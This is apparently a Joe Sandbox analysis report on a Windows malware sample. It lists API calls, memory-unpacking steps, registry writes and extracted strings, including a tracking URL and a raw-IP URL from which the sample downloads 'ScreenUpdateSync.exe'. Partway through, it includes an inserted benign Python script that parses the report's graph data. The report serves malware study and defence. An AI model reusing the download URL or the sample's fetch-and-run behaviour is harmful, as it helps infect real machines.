                                                                                    • Instruction ID: 006e68bf3f1d2291baca7e3f3ccd15ce7d6f583b40adfd1c0386b5d8b5644812
                                                                                    • Opcode Fuzzy Hash: 333ff1eee16b6be64793bd318ad3fa05ede6171504cd334b681c7e0d8fb5623c
                                                                                    • Instruction Fuzzy Hash: 70A13632E101049FDF19AF68EC917AE7BA0AF0A324F14115EF805AB3D1D7389D12CB5A

                                                                                    Control-flow Graph: rendered graph not recoverable from the report text; first basic block at 0x9e003c, API calls in graph: VirtualAlloc, VirtualProtect, VirtualFree, LoadLibraryA
                                                                                    APIs
                                                                                    • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 009E024D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AllocVirtual
                                                                                    • String ID: cess$kernel32.dll
                                                                                    • API String ID: 4275171209-1230238691
                                                                                    • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                    • Instruction ID: f5a3dc62cdc7acb52c977fcb413e7c7b233ed43874cc1a3f8a902debe43d26ff
                                                                                    • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                    • Instruction Fuzzy Hash: A6528874A00269DFDB65CF59C984BA8BBB1BF49304F1480D9E94DAB351DB70AE84DF10

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • InternetOpenW.WININET(ShareScreen,00000000,00000000,00000000,00000000), ref: 00402C47
                                                                                      • Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010C1
                                                                                      • Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010DD
                                                                                    • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00402E5F
                                                                                    • InternetCloseHandle.WININET(00000000), ref: 00402E70
                                                                                    • InternetCloseHandle.WININET(00000000), ref: 00402E73
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: Internet$CloseHandleOpen_wcslen
                                                                                    • String ID: &cc=DE$ShareScreen$https://post-to-me.com/track_prt.php?sub=
                                                                                    • API String ID: 3067768807-1501832161
                                                                                    • Opcode ID: a8bec4743929572fb9f32f475d47f4abd6f055372441a00394d7fc50db865c55
                                                                                    • Instruction ID: 48789f1b3701ba946f3e6b41f8bd096f2728906552624118b4e60daa7bc135c0
                                                                                    • Opcode Fuzzy Hash: a8bec4743929572fb9f32f475d47f4abd6f055372441a00394d7fc50db865c55
                                                                                    • Instruction Fuzzy Hash: 89516095A65344A8E320EFB0BC52F363378EF58712F10643BE518CB2B2E3B59944875E

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: Cnd_initstd::_$Cnd_waitMtx_initThrd_start
                                                                                    • String ID: %X@
                                                                                    • API String ID: 1687354797-3313093589
                                                                                    • Opcode ID: 0ea570f09f259dfbc3d5b47f4c5eb340c08c0aee3b3523c1dfd7de2be87ac1a9
                                                                                    • Instruction ID: b3e9ac138a89c9aab4b32a44e65933d882eee500b320c13cfd578e42c41f9d09
                                                                                    • Opcode Fuzzy Hash: 0ea570f09f259dfbc3d5b47f4c5eb340c08c0aee3b3523c1dfd7de2be87ac1a9
                                                                                    • Instruction Fuzzy Hash: 3D214172C042499ADF15EBE9D881BDEB7F8AF08318F14407FE504B72C1DB7D99488A69

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • GetLastError.KERNEL32(00457910,00000010,00000003,00431F7D), ref: 0042DFF3
                                                                                    • ExitThread.KERNEL32 ref: 0042DFFA
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorExitLastThread
                                                                                    • String ID: 11@$f(@
                                                                                    • API String ID: 1611280651-1277599000
                                                                                    • Opcode ID: 05a6bf9322938420f326034e00ba90610ba59fb7b5f4eb19846d64da3dd64c95
                                                                                    • Instruction ID: 8ccfe30e394ff3a7da82f1aad20c2a43f0afb1cc8a6867a0b2db1ae1affa3120
                                                                                    • Opcode Fuzzy Hash: 05a6bf9322938420f326034e00ba90610ba59fb7b5f4eb19846d64da3dd64c95
                                                                                    • Instruction Fuzzy Hash: 5BF0C874600624AFDB04AFB1D80ABAD3B70FF49715F10056EF4055B392CB796955CB68

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • std::_Cnd_initX.LIBCPMT ref: 00405841
                                                                                    • __Cnd_signal.LIBCPMT ref: 0040584D
                                                                                    • std::_Cnd_initX.LIBCPMT ref: 00405862
                                                                                    • __Cnd_do_broadcast_at_thread_exit.LIBCPMT ref: 00405869
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: Cnd_initstd::_$Cnd_do_broadcast_at_thread_exitCnd_signal
                                                                                    • String ID:
                                                                                    • API String ID: 2059591211-0
                                                                                    • Opcode ID: 16e91ae191353f76377487b504f8ad98fae09f0c97f906459e9bfe3258fa4ce0
                                                                                    • Instruction ID: d72f8bc51fec51febc5e3899202a3526e07d3a061d0a8301a91111c4e624332c
                                                                                    • Opcode Fuzzy Hash: 16e91ae191353f76377487b504f8ad98fae09f0c97f906459e9bfe3258fa4ce0
                                                                                    • Instruction Fuzzy Hash: 20F0A7714007009BE7317762C817B0A77A0AF0031DF10883FF15A769E2CF7DA8544A5D

                                                                                    Control-flow Graph: rendered graph not recoverable from the report text; first basic block at 0x402980, no direct API calls in graph
                                                                                    APIs
                                                                                    • _wcslen.LIBCMT ref: 004029AF
                                                                                    • __fassign.LIBCMT ref: 004029BF
                                                                                      • Part of subcall function 00402843: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00402926
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: Ios_base_dtor__fassign_wcslenstd::ios_base::_
                                                                                    • String ID: 4+@
                                                                                    • API String ID: 2843524283-3700369575
                                                                                    • Opcode ID: d6927ac8dcf44b0011b1dce344e42bafe9dfab0a11997840a9f38d6492e0eb02
                                                                                    • Instruction ID: 257e808548a25f0c421a3fe296c20495207b494aef35f76eb7bec397418e7454
                                                                                    • Opcode Fuzzy Hash: d6927ac8dcf44b0011b1dce344e42bafe9dfab0a11997840a9f38d6492e0eb02
                                                                                    • Instruction Fuzzy Hash: 1801F9B1E0021C5ADB24FA25EC46BEF7768AB41304F0402FFA705E31C1D9785E45CA88

                                                                                    Control-flow Graph: rendered graph not recoverable from the report text; first basic block at 0x42e134, API calls in graph: CreateThread, GetLastError
                                                                                    APIs
                                                                                    • CreateThread.KERNEL32(?,?,Function_0002DFE0,00000000,?,?), ref: 0042E17D
                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,0040CF33,00000000,00000000,?,?,00000000,?), ref: 0042E189
                                                                                    • __dosmaperr.LIBCMT ref: 0042E190
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateErrorLastThread__dosmaperr
                                                                                    • String ID:
                                                                                    • API String ID: 2744730728-0
                                                                                    • Opcode ID: f788247bfe16cd787040539d6f1c9311eafedbd5b023f877c643640da45ad27a
                                                                                    • Instruction ID: e33ff4e630afc97a712763e24a24b73512c1ee0121ef7b9dc61686095db8a569
                                                                                    • Opcode Fuzzy Hash: f788247bfe16cd787040539d6f1c9311eafedbd5b023f877c643640da45ad27a
                                                                                    • Instruction Fuzzy Hash: 7F01D236600229ABDB119FA3FC05AAF3B69EF81360F50013AF91582210DB358921DBA8

                                                                                    Control-flow Graph: rendered graph not recoverable from the report text; first basic block at 0x434775, API calls in graph: SetFilePointerEx, GetLastError
                                                                                    APIs
                                                                                    • SetFilePointerEx.KERNEL32(00000000,00000000,0040DDFA,00000000,00000002,0040DDFA,00000000,?,?,?,00434824,00000000,00000000,0040DDFA,00000002), ref: 004347AE
                                                                                    • GetLastError.KERNEL32(?,00434824,00000000,00000000,0040DDFA,00000002,?,0042C181,?,00000000,00000000,00000001,?,0040DDFA,?,0042C236), ref: 004347B8
                                                                                    • __dosmaperr.LIBCMT ref: 004347BF
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorFileLastPointer__dosmaperr
                                                                                    • String ID:
                                                                                    • API String ID: 2336955059-0
                                                                                    • Opcode ID: 0f8939188b6fdc8a7da50d1b405e1129083f9e2b96a50d0a3cd5949e7845d65d
                                                                                    • Instruction ID: 3f4161a45120eee3ca6c804ab5e0c8b7ff266a4415271cac2496bd2984e95623
                                                                                    • Opcode Fuzzy Hash: 0f8939188b6fdc8a7da50d1b405e1129083f9e2b96a50d0a3cd5949e7845d65d
                                                                                    • Instruction Fuzzy Hash: CC016836610114ABCB159FAADC058EF7B29EFCA730F24030AF814872C0EB74AD418794

                                                                                    Control-flow Graph: rendered graph not recoverable from the report text; first basic block at 0x402bcd, API calls in graph: RegCreateKeyExW, RegSetValueExW, RegCloseKey
                                                                                    APIs
                                                                                    • RegCreateKeyExW.KERNEL32(80000001,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00402BEF
                                                                                    • RegSetValueExW.KERNEL32(?,?,00000000,00000001,?,00000004,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00402C07
                                                                                    • RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00402C17
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseCreateValue
                                                                                    • String ID:
                                                                                    • API String ID: 1818849710-0
                                                                                    • Opcode ID: 17a0f39c5dea863e0681c067e94205fb1cf9212befe975e377a74504568b03c9
                                                                                    • Instruction ID: 5f9d8f05081ab8e61a544dd9ed380a1f0a89feb258115cbe41ff1dcf5e2af099
                                                                                    • Opcode Fuzzy Hash: 17a0f39c5dea863e0681c067e94205fb1cf9212befe975e377a74504568b03c9
                                                                                    • Instruction Fuzzy Hash: 75F0B4B650011CFFEB214F94DD89DAFBA7CEB417E9F100175FA01B2150D6B14E009664

Control-flow Graph
• 42e094-42e0a1 call 431f7e → 42e0a3-42e0a6, 42e0ac-42e0b4
• 42e0a3-42e0a6 ExitThread (no successors)
• 42e0ac-42e0b4 → 42e0a3-42e0a6, 42e0b6-42e0ba
• 42e0b6-42e0ba → 42e0c1-42e0c7, 42e0bc
• 42e0bc call 435516 → 42e0c1-42e0c7
• 42e0c1-42e0c7 → 42e0d4-42e0da, 42e0c9-42e0cb
• 42e0c9-42e0cb → 42e0d4-42e0da, 42e0cd-42e0ce
• 42e0cd-42e0ce CloseHandle → 42e0d4-42e0da
• 42e0d4-42e0da → 42e0a3-42e0a6, 42e0dc-42e0de
• 42e0dc-42e0de → 42e0a3-42e0a6, 42e0e0-42e0ea
• 42e0e0-42e0ea FreeLibraryAndExitThread (no successors)
                                                                                    APIs
                                                                                      • Part of subcall function 00431F7E: GetLastError.KERNEL32(?,?,?,0042EAEE,00434D9C,?,00431F28,00000001,00000364,?,0042E005,00457910,00000010), ref: 00431F83
                                                                                      • Part of subcall function 00431F7E: _free.LIBCMT ref: 00431FB8
                                                                                      • Part of subcall function 00431F7E: SetLastError.KERNEL32(00000000), ref: 00431FEC
                                                                                    • ExitThread.KERNEL32 ref: 0042E0A6
                                                                                    • CloseHandle.KERNEL32(?,?,?,0042E1C6,?,?,0042E03D,00000000), ref: 0042E0CE
                                                                                    • FreeLibraryAndExitThread.KERNEL32(?,?,?,?,0042E1C6,?,?,0042E03D,00000000), ref: 0042E0E4
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorExitLastThread$CloseFreeHandleLibrary_free
                                                                                    • String ID:
                                                                                    • API String ID: 1198197534-0
                                                                                    • Opcode ID: 358fd455719f577d8bc93a3d3127ed53d65e98e9d00355e3dd6338ab7ece4e02
                                                                                    • Instruction ID: 02d263aed51cb6b3bee4cffa2fb4446158e609bbc081d0db7e94150c61e2e04c
                                                                                    • Opcode Fuzzy Hash: 358fd455719f577d8bc93a3d3127ed53d65e98e9d00355e3dd6338ab7ece4e02
                                                                                    • Instruction Fuzzy Hash: 8FF05E302006347BDB356F27E808A5B3AA8AF05764F484726B924C37A1D7B8DD828698

Control-flow Graph
• 43cfeb-43d005 call 43f961 → 43d007-43d00a, 43d00c-43d024
• 43d007-43d00a → 43d038-43d03b
• 43d00c-43d024 call 43d05c → 43d029-43d037
• 43d029-43d037 call 43348a → 43d038-43d03b
• 43d038-43d03b (no successors)
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: _free
                                                                                    • String ID: 'C
                                                                                    • API String ID: 269201875-3508614867
                                                                                    • Opcode ID: dcff01ba0718bc25fbadba801be0e76f759b5211c2d86b2f90a3e61a906836b7
                                                                                    • Instruction ID: ac23cf383b269f77c0b068b48fc7cf8c71372a03a023b6a8bdb9567da4463856
                                                                                    • Opcode Fuzzy Hash: dcff01ba0718bc25fbadba801be0e76f759b5211c2d86b2f90a3e61a906836b7
                                                                                    • Instruction Fuzzy Hash: D0F09A32810008BBCF155E96EC01DDF3B6AEF89338F10115AFA1492150DA3A8A22ABA4
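The one-line control_flow_graph text that accompanies the graphs above is the serialised form of the interactive graph: each basic block appears as `ID start[-end] [label]`, where the label is an imported API name or `call <addr>`, and each edge as `A->B`. The script below is an added example, not part of the Joe Sandbox report or of its IDA plugin. It rebuilds blocks and edges from that text and enumerates the API-call orderings the graph allows, which answers questions such as whether every path through the registry routine at 402bcd reaches RegCloseKey (it does not: two of the four orderings skip it). The three graph strings are copied from this page; treating the lowest-addressed block as the entry is my assumption, and the walk skips back-edges so that looping functions terminate.

```python
"""Rebuild basic blocks and edges from the one-line control_flow_graph text that
Joe Sandbox prints for each function, then list the API-call orderings it allows.

Added example, not part of the report or the Joe Sandbox IDA plugin. Token format
as observed on this page: "ID start[-end] [label]" per block, "A->B" per edge,
where label is an API name or "call <addr>".
"""
from __future__ import annotations
import re
from dataclasses import dataclass

_EDGE = re.compile(r"^(\d+)->(\d+)$")
_ADDR = re.compile(r"^([0-9a-f]+)(?:-([0-9a-f]+))?$")


@dataclass
class Block:
    bid: int
    start: int
    end: int
    label: str   # API name, "call <addr>", or "" when the block makes no call


def parse_cfg(text: str):
    """Return ({block id: Block}, [(src id, dst id), ...])."""
    toks = text.split()
    if toks and toks[0] == "control_flow_graph":
        toks = toks[1:]
    blocks, edges, i = {}, [], 0
    while i < len(toks):
        m = _EDGE.match(toks[i])
        if m:
            edges.append((int(m.group(1)), int(m.group(2))))
            i += 1
            continue
        bid = int(toks[i])                      # a block id is always followed by its range
        am = _ADDR.match(toks[i + 1])
        if am is None:
            raise ValueError(f"expected address range after block {bid}, got {toks[i + 1]!r}")
        start = int(am.group(1), 16)
        end = int(am.group(2), 16) if am.group(2) else start
        i += 2
        label = ""
        if i < len(toks):
            if toks[i] == "call":               # "call 431f7e": an intra-module call
                label = f"call {toks[i + 1]}"
                i += 2
            elif not toks[i].isdigit() and not _EDGE.match(toks[i]):
                label = toks[i]                 # an imported API name
                i += 1
        blocks[bid] = Block(bid, start, end, label)
    return blocks, edges


def api_orderings(blocks, edges, entry=None):
    """Sequences of labels along simple paths from the entry block to blocks with no successors.

    Assumption: the lowest-addressed block is the entry unless one is given. Back-edges
    are skipped so loops terminate; a path that can only continue through a back-edge
    is dropped rather than recorded.
    """
    succ = {bid: [] for bid in blocks}
    for s, d in edges:
        succ[s].append(d)
    if entry is None:
        entry = min(blocks.values(), key=lambda b: b.start).bid
    out = set()

    def walk(bid, labels, on_path):
        label = blocks[bid].label
        labels = labels + ((label,) if label else ())
        if not succ[bid]:
            out.add(labels)
            return
        for nxt in succ[bid]:
            if nxt not in on_path:
                walk(nxt, labels, on_path | {nxt})

    walk(entry, (), {entry})
    return out


# The three graph strings copied from this report.
REGISTRY_CFG = ("control_flow_graph 487 402bcd-402bf9 RegCreateKeyExW 488 402bfb-402c0d RegSetValueExW "
                "487->488 489 402c0f-402c12 487->489 488->489 490 402c14-402c17 RegCloseKey 489->490 "
                "491 402c1d-402c23 489->491 490->491")
THREAD_EXIT_CFG = ("control_flow_graph 492 42e094-42e0a1 call 431f7e 495 42e0a3-42e0a6 ExitThread 492->495 "
                   "496 42e0ac-42e0b4 492->496 496->495 497 42e0b6-42e0ba 496->497 498 42e0c1-42e0c7 "
                   "497->498 499 42e0bc call 435516 497->499 501 42e0d4-42e0da 498->501 502 42e0c9-42e0cb "
                   "498->502 499->498 501->495 504 42e0dc-42e0de 501->504 502->501 503 42e0cd-42e0ce "
                   "CloseHandle 502->503 503->501 504->495 505 42e0e0-42e0ea FreeLibraryAndExitThread 504->505")
FREE_CFG = ("control_flow_graph 506 43cfeb-43d005 call 43f961 509 43d007-43d00a 506->509 510 43d00c-43d024 "
            "call 43d05c 506->510 511 43d038-43d03b 509->511 513 43d029-43d037 call 43348a 510->513 513->511")

if __name__ == "__main__":
    for name, text in (("registry", REGISTRY_CFG), ("thread exit", THREAD_EXIT_CFG), ("free", FREE_CFG)):
        b, e = parse_cfg(text)
        print(f"{name}: {len(b)} blocks, {len(e)} edges")
        for order in sorted(api_orderings(b, e)):
            print("  ", " -> ".join(order) or "(no calls)")
```

Running it on the thread-exit graph shows every ordering starting with `call 431f7e` and ending in either ExitThread or FreeLibraryAndExitThread, with CloseHandle on only some of them, which is the same information the coloured graph conveys but in a form that can be grepped or diffed across samples.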
                                                                                    APIs
                                                                                    • DefWindowProcW.USER32(?,?,?,?), ref: 004023E1
                                                                                    • PostQuitMessage.USER32(00000000), ref: 00402583
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessagePostProcQuitWindow
                                                                                    • String ID:
                                                                                    • API String ID: 3873111417-0
                                                                                    • Opcode ID: 1f3d487c3c03d627e5903ad7b0a4cc32456bcc0014a944db875e3b1801701b52
                                                                                    • Instruction ID: f7540e8b067131d9abd8b97533556e050534cde561c52fa9c46de49641595c4f
                                                                                    • Opcode Fuzzy Hash: 1f3d487c3c03d627e5903ad7b0a4cc32456bcc0014a944db875e3b1801701b52
                                                                                    • Instruction Fuzzy Hash: 91410C15A64384A9E730EFA5BD15B2537B0EF64762F10253BE528DB2F2E3B58580C30E
                                                                                    APIs
                                                                                    • Sleep.KERNEL32(0000215D), ref: 00401562
                                                                                      • Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010C1
                                                                                      • Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010DD
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: _wcslen$Sleep
                                                                                    • String ID: http://176.113.115.37/ScreenUpdateSync.exe
                                                                                    • API String ID: 3358372957-2681926500
                                                                                    • Opcode ID: ddfdc33ddaf944cd93ee91cdfc7456df5d56f708170e8b920f6740c66972ae79
                                                                                    • Instruction ID: a225884332a17bf582b8fadba65ee921369c39f73c189ef0fca73ca0a6338174
                                                                                    • Opcode Fuzzy Hash: ddfdc33ddaf944cd93ee91cdfc7456df5d56f708170e8b920f6740c66972ae79
                                                                                    • Instruction Fuzzy Hash: 6E318C15A6538094E230CFA5BC66B252330FFA8752F51253BD60CCB2F2E7A19583C71E
                                                                                    APIs
                                                                                    • SetErrorMode.KERNEL32(00000400,?,?,009E0223,?,?), ref: 009E0E19
                                                                                    • SetErrorMode.KERNEL32(00000000,?,?,009E0223,?,?), ref: 009E0E1E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ErrorMode
                                                                                    • String ID:
                                                                                    • API String ID: 2340568224-0
                                                                                    • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                    • Instruction ID: 518bfefd04ff1fa04a4c66aeaa9b8635698d5129f672d08a57038237baf20c59
                                                                                    • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                    • Instruction Fuzzy Hash: D1D0123114512877D7012A95DC09BCD7B1CDF09B62F008421FB0DD9080C7B0994046E5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 77dff8414438c132d9b1b222249ac9577754d763359ce41167806e2a442978e4
                                                                                    • Instruction ID: c13f0aaa9ffca533a2c3afb5b433fd4ee60c85f45f94f80d5c2ee7b15d17ea23
                                                                                    • Opcode Fuzzy Hash: 77dff8414438c132d9b1b222249ac9577754d763359ce41167806e2a442978e4
                                                                                    • Instruction Fuzzy Hash: 2051C331A00218AFDB10DF59C840BEA7BA1EBC9364F19919AF809AB391C735FD42CB54
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: __fread_nolock
                                                                                    • String ID:
                                                                                    • API String ID: 2638373210-0
                                                                                    • Opcode ID: 2283a06a2fad5c3ceff95e800cd0e8c9cbaa35fb85d12550c614d86d70b6a1f3
                                                                                    • Instruction ID: b9260250dbf28f9d15b3c818f63209514cdecf0a47afbf9c4decfe0e49894dcf
                                                                                    • Opcode Fuzzy Hash: 2283a06a2fad5c3ceff95e800cd0e8c9cbaa35fb85d12550c614d86d70b6a1f3
                                                                                    • Instruction Fuzzy Hash: 95316AF5604716AFC710CF2AC880A1ABFA9BF84351F04C53EF84497791D739DA548B8A
                                                                                    APIs
                                                                                    • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00402926
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: Ios_base_dtorstd::ios_base::_
                                                                                    • String ID:
                                                                                    • API String ID: 323602529-0
                                                                                    • Opcode ID: ac15786566c7c12d7d6604bc2b543ac292efb61edc09540775426cdd15f97b46
                                                                                    • Instruction ID: 06a190b1af6bffd0b30009583d7beab466b865d2b1cdf6d05da26eaaeda62aaf
                                                                                    • Opcode Fuzzy Hash: ac15786566c7c12d7d6604bc2b543ac292efb61edc09540775426cdd15f97b46
                                                                                    • Instruction Fuzzy Hash: E3312CB4D002199BDB04EFA5C891AEDBBB4BF58304F5085AEE415B3681DB786A48CF54
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: H_prolog3_catch
                                                                                    • String ID:
                                                                                    • API String ID: 3886170330-0
                                                                                    • Opcode ID: 8f7dc48dcb05c21fbbcda5fcf12e76a98b4592d37682d1b18d39cb0d63f71a47
                                                                                    • Instruction ID: 130d185d73aa858ab00e75432ddc36e19440830dd378bf412e93c481dd82f4d6
                                                                                    • Opcode Fuzzy Hash: 8f7dc48dcb05c21fbbcda5fcf12e76a98b4592d37682d1b18d39cb0d63f71a47
                                                                                    • Instruction Fuzzy Hash: 98215870A00245EFCB11DF55C480EAEBBB5BF48704F2480AEE805AB391C778AE50CB94
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: __wsopen_s
                                                                                    • String ID:
                                                                                    • API String ID: 3347428461-0
                                                                                    • Opcode ID: ebde34e331f36d73ae22f6b7be2bf13c9f524ff7c3251c4fe3554b52cc0156cf
                                                                                    • Instruction ID: 247e0a556512b48f7b921b083965eca1f7392b8622cfa12ec24d1c2ccd616764
                                                                                    • Opcode Fuzzy Hash: ebde34e331f36d73ae22f6b7be2bf13c9f524ff7c3251c4fe3554b52cc0156cf
                                                                                    • Instruction Fuzzy Hash: B511067590420AAFCB05DF58E94199A7BF4EF48314F10406AF809AB311D671EA158BA9
                                                                                    APIs
                                                                                    • RtlAllocateHeap.NTDLL(00000000,0040D895,00000000,?,004267BE,00000002,00000000,00000000,00000000,?,0040CD46,0040D895,00000004,00000000,00000000,00000000), ref: 004336F9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: AllocateHeap
                                                                                    • String ID:
                                                                                    • API String ID: 1279760036-0
                                                                                    • Opcode ID: 94f750592cee1f743f5fc95d96a6c8fbd485f7a37a0c4c452716bcfbad1791b8
                                                                                    • Instruction ID: 8b2e0ce5f68243881f48833c9379da8a786ec54fae66de81054fb87b7da3eb6a
                                                                                    • Opcode Fuzzy Hash: 94f750592cee1f743f5fc95d96a6c8fbd485f7a37a0c4c452716bcfbad1791b8
                                                                                    • Instruction Fuzzy Hash: C9E0E5B1A046207ADA302FA65C06B5B3A48AF497B2F056133FC0592290FF2CDE4081AD
                                                                                    APIs
